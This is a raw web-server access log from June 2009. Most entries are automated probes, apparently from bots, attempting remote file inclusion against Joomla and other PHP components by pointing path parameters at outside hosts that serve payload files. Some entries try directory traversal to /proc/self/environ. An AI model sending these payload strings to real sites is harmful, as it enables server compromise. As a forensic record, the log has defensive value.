222.239.76.25 - - [06/Jun/2009:06:03:53 -0400] "GET /logs/access_log.Q109051800//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
222.239.76.25 - - [06/Jun/2009:06:03:53 -0400] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
222.239.76.25 - - [06/Jun/2009:06:03:53 -0400] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
78.24.219.48 - - [06/Jun/2009:06:04:00 -0400] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.aqualifegroup.ru/test?? HTTP/1.1" 404 216 "-" "libwww-perl/5.826"
195.34.78.110 - - [06/Jun/2009:06:04:14 -0400] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jun/2009:06:04:14 -0400] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jun/2009:06:04:14 -0400] "GET /logs/access_log.Q109051800//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jun/2009:06:04:16 -0400] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jun/2009:06:04:16 -0400] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jun/2009:06:04:16 -0400] "GET /logs/access_log.Q109051800//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
78.24.219.48 - - [06/Jun/2009:06:04:41 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aqualifegroup.ru/test?? HTTP/1.1" 404 249 "-" "libwww-perl/5.826"
78.24.219.48 - - [06/Jun/2009:06:05:01 -0400] "GET /logs/access_log.Q109052900//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aqualifegroup.ru/test?? HTTP/1.1" 404 276 "-" "libwww-perl/5.826"
69.73.144.26 - - [06/Jun/2009:06:05:23 -0400] "GET /logs/error_log.Q109052000/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=http://colegiopenacorada.com/xoops_lib/modules/pw.txt??? HTTP/1.1" 404 266 "-" "libwww-perl/5.810"
78.24.219.48 - - [06/Jun/2009:06:06:06 -0400] "GET /logs/access_log.Q109050300//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aqualifegroup.ru/test?? HTTP/1.1" 404 276 "-" "libwww-perl/5.826"
78.24.219.48 - - [06/Jun/2009:06:06:06 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aqualifegroup.ru/test?? HTTP/1.1" 404 254 "-" "libwww-perl/5.826"
216.17.99.13 - - [06/Jun/2009:06:06:33 -0400] "GET /logs/access_log.Q109051100//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aqualifegroup.ru/test?? HTTP/1.1" 404 276 "-" "libwww-perl/5.826"
216.17.99.13 - - [06/Jun/2009:06:06:33 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aqualifegroup.ru/test?? HTTP/1.1" 404 254 "-" "libwww-perl/5.826"
201.232.54.48 - - [06/Jun/2009:06:06:48 -0400] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
201.232.54.48 - - [06/Jun/2009:06:06:48 -0400] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
201.232.54.48 - - [06/Jun/2009:06:06:48 -0400] "GET /logs/access_log.Q109051600//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Jun/2009:06:07:25 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
222.239.76.25 - - [06/Jun/2009:06:07:30 -0400] "GET /logs/error_log.Q109051800//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
216.17.99.13 - - [06/Jun/2009:06:07:57 -0400] "GET /logs/access_log.Q109052200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aqualifegroup.ru/test?? HTTP/1.1" 404 276 "-" "libwww-perl/5.826"
216.17.99.13 - - [06/Jun/2009:06:07:57 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aqualifegroup.ru/test?? HTTP/1.1" 404 254 "-" "libwww-perl/5.826"
216.17.99.13 - - [06/Jun/2009:06:08:02 -0400] "GET /logs/access_log.Q109052900//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aqualifegroup.ru/test?? HTTP/1.1" 404 276 "-" "libwww-perl/5.826"
218.249.36.194 - - [06/Jun/2009:06:08:13 -0400] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
218.249.36.194 - - [06/Jun/2009:06:08:13 -0400] "GET /logs/access_log.Q109051600//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
218.249.36.194 - - [06/Jun/2009:06:08:13 -0400] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
212.150.52.114 - - [06/Jun/2009:06:08:24 -0400] "GET /logs/access_log.Q109053100/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://corect.at.ua/idv4.txt??? HTTP/1.1" 404 274 "-" "libwww-perl/5.805"
212.150.52.114 - - [06/Jun/2009:06:08:24 -0400] "GET /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://corect.at.ua/idv4.txt??? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
212.150.52.114 - - [06/Jun/2009:06:08:24 -0400] "GET /logs/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://corect.at.ua/idv4.txt??? HTTP/1.1" 404 252 "-" "libwww-perl/5.805"
218.249.36.194 - - [06/Jun/2009:06:08:26 -0400] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
218.249.36.194 - - [06/Jun/2009:06:08:27 -0400] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
218.249.36.194 - - [06/Jun/2009:06:08:27 -0400] "GET /logs/access_log.Q109051600//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
91.121.137.51 - - [06/Jun/2009:06:08:37 -0400] "GET /?path%5Bdocroot%5D=http://www.eyepro.net//assets/images/v6-i.txt??? HTTP/1.1" 200 409 "-" "libwww-perl/5.805"
91.121.137.51 - - [06/Jun/2009:06:08:37 -0400] "GET /logs/access_log.Q109051000/?path%5Bdocroot%5D=http://www.eyepro.net//assets/images/v6-i.txt??? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
91.121.137.51 - - [06/Jun/2009:06:08:37 -0400] "GET /logs/?path%5Bdocroot%5D=http://www.eyepro.net//assets/images/v6-i.txt??? HTTP/1.1" 200 4366 "-" "libwww-perl/5.805"
216.17.99.13 - - [06/Jun/2009:06:08:48 -0400] "GET /logs/error_log.Q109042900//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aqualifegroup.ru/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.826"
78.24.219.48 - - [06/Jun/2009:06:09:07 -0400] "GET /logs/access_log.Q109052400//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aqualifegroup.ru/test?? HTTP/1.1" 404 276 "-" "libwww-perl/5.826"
78.24.219.48 - - [06/Jun/2009:06:09:12 -0400] "GET /logs/access_log.Q109052200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aqualifegroup.ru/test?? HTTP/1.1" 404 276 "-" "libwww-perl/5.826"
78.24.219.48 - - [06/Jun/2009:06:09:13 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aqualifegroup.ru/test?? HTTP/1.1" 404 254 "-" "libwww-perl/5.826"
91.121.137.51 - - [06/Jun/2009:06:09:33 -0400] "GET /logs/access_log.Q109052600/?path%5Bdocroot%5D=http://www.eyepro.net//assets/images/v6-i.txt??? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
216.17.99.13 - - [06/Jun/2009:06:09:43 -0400] "GET /logs/error_log.Q109042900//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aqualifegroup.ru/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.826"
216.17.99.13 - - [06/Jun/2009:06:09:43 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aqualifegroup.ru/test?? HTTP/1.1" 404 254 "-" "libwww-perl/5.826"
125.206.170.126 - - [06/Jun/2009:06:09:56 -0400] "GET /logs/access_log.Q109051800//zboard.php?id=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.0" 404 236 "-" "Mozilla/5.0"
125.206.170.126 - - [06/Jun/2009:06:09:56 -0400] "GET //zboard.php?id=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.0" 404 209 "-" "Mozilla/5.0"
125.206.170.126 - - [06/Jun/2009:06:09:56 -0400] "GET /logs//zboard.php?id=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.0" 404 214 "-" "Mozilla/5.0"
216.17.99.13 - - [06/Jun/2009:06:09:59 -0400] "GET /logs/error_log.Q109041300//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aqualifegroup.ru/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.826"
78.24.219.48 - - [06/Jun/2009:06:10:08 -0400] "GET /logs/error_log.Q109042900//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aqualifegroup.ru/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.826"
222.255.37.201 - - [06/Jun/2009:06:10:12 -0400] "GET /logs/access_log.Q109053100/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://klean-tech.com.tw/upload/idv4.txt?? HTTP/1.1" 404 274 "-" "libwww-perl/5.79"
222.255.37.201 - - [06/Jun/2009:06:10:14 -0400] "GET /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://klean-tech.com.tw/upload/idv4.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.79"
222.255.37.201 - - [06/Jun/2009:06:10:15 -0400] "GET /logs/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://klean-tech.com.tw/upload/idv4.txt?? HTTP/1.1" 404 252 "-" "libwww-perl/5.79"
91.121.137.51 - - [06/Jun/2009:06:10:15 -0400] "GET /logs/access_log.Q109052400/errors.php?error=http://www.eyepro.net//assets/images/v6-i.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
91.121.137.51 - - [06/Jun/2009:06:10:15 -0400] "GET /logs/errors.php?error=http://www.eyepro.net//assets/images/v6-i.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
91.121.137.51 - - [06/Jun/2009:06:10:15 -0400] "GET /errors.php?error=http://www.eyepro.net//assets/images/v6-i.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
91.121.137.51 - - [06/Jun/2009:06:10:15 -0400] "GET /logs/access_log.Q109051000/errors.php?error=http://www.eyepro.net//assets/images/v6-i.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
201.232.54.48 - - [06/Jun/2009:06:11:07 -0400] "GET /logs/access_log.Q109051600%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jun/2009:06:11:27 -0400] "GET /logs/access_log.Q109051800%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jun/2009:06:11:27 -0400] "GET /logs/access_log.Q109051800%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
70.85.249.226 - - [06/Jun/2009:06:11:29 -0400] "GET //include/mail.inc.php?skin_board_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
70.85.249.226 - - [06/Jun/2009:06:11:29 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
70.85.249.226 - - [06/Jun/2009:06:11:29 -0400] "GET /logs/access_log.Q109051100%20%20//include/mail.inc.php?skin_board_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
125.206.170.126 - - [06/Jun/2009:06:11:34 -0400] "GET /logs/access_log.Q109052100//zboard.php?id=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.0" 404 236 "-" "Mozilla/5.0"
201.232.54.48 - - [06/Jun/2009:06:11:34 -0400] "GET /errors.php?error=http://aboutav.com//id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
201.232.54.48 - - [06/Jun/2009:06:11:34 -0400] "GET /logs/errors.php?error=http://aboutav.com//id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
212.150.52.114 - - [06/Jun/2009:06:11:57 -0400] "GET /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://corect.at.ua/idv4.txt??? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
94.23.200.54 - - [06/Jun/2009:06:12:12 -0400] "GET /errors.php?error=http://www.active-trend.com///video/media/fx29id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
94.23.200.54 - - [06/Jun/2009:06:12:12 -0400] "GET /logs/errors.php?error=http://www.active-trend.com///video/media/fx29id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Jun/2009:06:12:24 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.249.36.194 - - [06/Jun/2009:06:12:28 -0400] "GET /logs/access_log.Q109051600%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
218.249.36.194 - - [06/Jun/2009:06:12:36 -0400] "GET /logs/access_log.Q109051600%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
77.221.130.2 - - [06/Jun/2009:06:12:52 -0400] "GET /logs/access_log.Q109051700//templates/mangobery/footer.sample.php?Site_Path=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 263 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
77.221.130.2 - - [06/Jun/2009:06:12:52 -0400] "GET //templates/mangobery/footer.sample.php?Site_Path=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 236 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
77.221.130.2 - - [06/Jun/2009:06:12:52 -0400] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 241 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
77.221.130.2 - - [06/Jun/2009:06:12:52 -0400] "GET /logs/access_log.Q109051700/errors.php?error=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
77.221.130.2 - - [06/Jun/2009:06:12:52 -0400] "GET /errors.php?error=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
77.221.130.2 - - [06/Jun/2009:06:12:52 -0400] "GET /logs/errors.php?error=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
77.221.130.2 - - [06/Jun/2009:06:12:52 -0400] "GET /logs/access_log.Q109051700//templates/mangobery/footer.sample.php?Site_Path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 263 "-" "XXXXXX"
77.221.130.2 - - [06/Jun/2009:06:12:52 -0400] "GET //templates/mangobery/footer.sample.php?Site_Path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 236 "-" "XXXXXX"
77.221.130.2 - - [06/Jun/2009:06:12:52 -0400] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 241 "-" "XXXXXX"
77.221.130.2 - - [06/Jun/2009:06:12:53 -0400] "GET /logs/access_log.Q109051700//templates/mangobery/footer.sample.php?Site_Path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 263 "-" "XXXXXX"
77.221.130.2 - - [06/Jun/2009:06:12:53 -0400] "GET //templates/mangobery/footer.sample.php?Site_Path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 236 "-" "XXXXXX"
77.221.130.2 - - [06/Jun/2009:06:12:53 -0400] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 241 "-" "XXXXXX"
195.34.78.110 - - [06/Jun/2009:06:13:19 -0400] "GET //include/write.php?dir=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jun/2009:06:13:19 -0400] "GET /logs//include/write.php?dir=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
195.34.78.110 - - [06/Jun/2009:06:13:21 -0400] "GET /logs/access_log.Q109051800%20%20//include/write.php?dir=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
122.153.212.195 - - [06/Jun/2009:06:13:39 -0400] "GET /logs/error_log.Q109011700/components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 265 "-" "libwww-perl/5.65"
212.150.52.114 - - [06/Jun/2009:06:13:39 -0400] "GET /logs/error_log.Q109053100/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://corect.at.ua/idv4.txt??? HTTP/1.1" 404 273 "-" "libwww-perl/5.805"
122.153.212.195 - - [06/Jun/2009:06:13:40 -0400] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 239 "-" "libwww-perl/5.65"
122.153.212.195 - - [06/Jun/2009:06:13:40 -0400] "GET /logs/components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 244 "-" "libwww-perl/5.65"
78.24.219.48 - - [06/Jun/2009:06:13:40 -0400] "GET /logs/error_log.Q109042900//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aqualifegroup.ru/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.826"
122.153.212.195 - - [06/Jun/2009:06:13:40 -0400] "GET /logs/error_log.Q109011700/components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 265 "-" "libwww-perl/5.65"
78.24.219.48 - - [06/Jun/2009:06:13:41 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aqualifegroup.ru/test?? HTTP/1.1" 404 254 "-" "libwww-perl/5.826"
122.153.212.195 - - [06/Jun/2009:06:13:41 -0400] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 239 "-" "libwww-perl/5.65"
122.153.212.195 - - [06/Jun/2009:06:13:41 -0400] "GET /logs/components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 244 "-" "libwww-perl/5.65"
78.24.219.48 - - [06/Jun/2009:06:13:56 -0400] "GET /logs/error_log.Q109041300//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aqualifegroup.ru/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.826"
64.182.124.1 - - [06/Jun/2009:06:14:02 -0400] "GET //?mosConfig_absolute_path=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.0" 200 452 "-" "Mozilla/5.0"
64.182.124.1 - - [06/Jun/2009:06:14:02 -0400] "GET /logs//?mosConfig_absolute_path=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.0" 200 4371 "-" "Mozilla/5.0"
64.182.124.1 - - [06/Jun/2009:06:14:02 -0400] "GET /logs/access_log.Q109051700//?mosConfig_absolute_path=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.0" 404 226 "-" "Mozilla/5.0"
74.6.8.112 - - [06/Jun/2009:06:14:01 -0400] "GET /logs/access_log.Q109060600 HTTP/1.0" 200 422174 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
77.221.130.2 - - [06/Jun/2009:06:14:04 -0400] "GET /logs/access_log.Q109053100//templates/mangobery/footer.sample.php?Site_Path=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 263 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
77.221.130.2 - - [06/Jun/2009:06:14:04 -0400] "GET /logs/access_log.Q109053100/errors.php?error=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/3.0 (OS/2; U)"
77.221.130.2 - - [06/Jun/2009:06:14:05 -0400] "GET /logs/access_log.Q109053100//templates/mangobery/footer.sample.php?Site_Path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 263 "-" "XXXXXX"
77.221.130.2 - - [06/Jun/2009:06:14:05 -0400] "GET /logs/access_log.Q109053100//templates/mangobery/footer.sample.php?Site_Path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 263 "-" "XXXXXX"
195.34.78.110 - - [06/Jun/2009:06:14:20 -0400] "GET /logs/access_log.Q108112300%20%20//include/write.php?dir=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
201.232.54.48 - - [06/Jun/2009:06:14:37 -0400] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
201.232.54.48 - - [06/Jun/2009:06:14:37 -0400] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
201.232.54.48 - - [06/Jun/2009:06:14:40 -0400] "GET /logs/access_log.Q109050900/components/com_performs/performs.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
218.249.36.194 - - [06/Jun/2009:06:15:15 -0400] "GET /errors.php?error=http://aboutav.com//id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
218.249.36.194 - - [06/Jun/2009:06:15:15 -0400] "GET /logs/errors.php?error=http://aboutav.com//id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
218.249.36.194 - - [06/Jun/2009:06:15:17 -0400] "GET /errors.php?error=http://aboutav.com//id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
218.249.36.194 - - [06/Jun/2009:06:15:17 -0400] "GET /logs/errors.php?error=http://aboutav.com//id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
201.232.54.48 - - [06/Jun/2009:06:15:30 -0400] "GET /logs/access_log.Q109051000/components/com_performs/performs.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
74.6.8.112 - - [06/Jun/2009:06:15:50 -0400] "GET /scripts/browser_ice.js HTTP/1.0" 200 7226 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
218.149.85.37 - - [06/Jun/2009:06:15:58 -0400] "GET //?_zb_path=http://www.webdeoro.com/webdeoroimages//newswiremedia///id.txt? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
218.149.85.37 - - [06/Jun/2009:06:15:58 -0400] "GET /logs/access_log.Q109051100%20%20//?_zb_path=http://www.webdeoro.com/webdeoroimages//newswiremedia///id.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
218.149.85.37 - - [06/Jun/2009:06:15:58 -0400] "GET /logs//?_zb_path=http://www.webdeoro.com/webdeoroimages//newswiremedia///id.txt? HTTP/1.1" 200 4371 "-" "Mozilla/5.0"
64.182.124.1 - - [06/Jun/2009:06:16:26 -0400] "GET /logs/access_log.Q109051700%20%20//?mosConfig_absolute_path=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.0" 404 228 "-" "Mozilla/5.0"
78.24.219.48 - - [06/Jun/2009:06:16:57 -0400] "GET /logs/access_log.Q109051100//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aqualifegroup.ru/test?? HTTP/1.1" 404 276 "-" "libwww-perl/5.826"
78.24.219.48 - - [06/Jun/2009:06:16:57 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.aqualifegroup.ru/test?? HTTP/1.1" 404 254 "-" "libwww-perl/5.826"
209.59.12.99 - - [06/Jun/2009:06:17:25 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.249.36.194 - - [06/Jun/2009:06:17:41 -0400] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
218.249.36.194 - - [06/Jun/2009:06:17:41 -0400] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
218.249.36.194 - - [06/Jun/2009:06:17:41 -0400] "GET /logs/access_log.Q109050900/components/com_performs/performs.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
